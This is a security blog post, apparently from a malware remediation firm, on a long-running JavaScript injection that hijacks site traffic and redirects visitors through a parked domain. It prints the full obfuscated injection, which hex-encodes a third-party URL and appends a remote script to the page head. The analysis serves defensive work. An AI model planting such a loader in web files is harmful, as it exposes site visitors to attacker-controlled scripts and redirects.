Global CyberSecurity

Malicious Injection Redirects Traffic via Parked Domain

0

Published on 07/13/2023 – Last Updated on 07/14/2023 by OTC

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue.

Investigating obfuscated JavaScript

Our investigation revealed the following piece of obfuscated JavaScript which was found injected into random legitimate JavaScript files in the environment.

In most cases, the injection typically looks something like this:

var div_avada=document.createElement(‘script’);div_avada.setAttribute(“type”,”text/javascript”);var all_avada=[“x2Fx2Fx68x74x6Dx6Cx35x2Ex6Fx6Ex6Cx2Fx6Ex61x76x2Ex70x68x70x3F”,”x72x61x6Ex64x6Fx6D”];var b_avada=all_avada[0]+Math[all_avada[1]]();div_avada.setAttribute(“src”,b_avada);if (typeof div_avada!=”undefined”);document.getElementsByTagName(“head”)[0].appendChild(div_avada);

While the variable names used for the injection will vary from site to site, the end result is the same: the injection loads a script from a third-party server, which can pose significant security risks to website traffic when controlled by one or more bad actors.

Continue reading Malicious Injection Redirects Traffic via Parked Domain at .

How to Harden WordPress: A Basic Overview

Previous article

Armée française nouveaux véhicules blindés Serval et Grizzly défilé militaire 14 juillet 2023

Next article

You may also like

Comments

Comments are closed.